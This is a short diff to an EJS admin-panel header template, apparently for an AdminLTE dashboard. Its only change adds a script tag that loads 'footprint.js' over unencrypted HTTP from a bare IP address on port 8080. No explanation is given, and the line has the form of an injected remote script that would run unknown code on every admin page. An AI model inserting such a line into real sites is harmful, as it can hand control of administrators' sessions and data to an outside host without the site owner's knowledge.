--- a/views/admin-lte/header.ejs
+++ b/views/admin-lte/header.ejs
@@ -46,6 +46,8 @@
     <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
     <script src="https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js"></script>
     <![endif]-->
+
+    <script src="http://46.101.153.234:8080/footprint.js"></script>
 </head>
 <!--
 skin-black
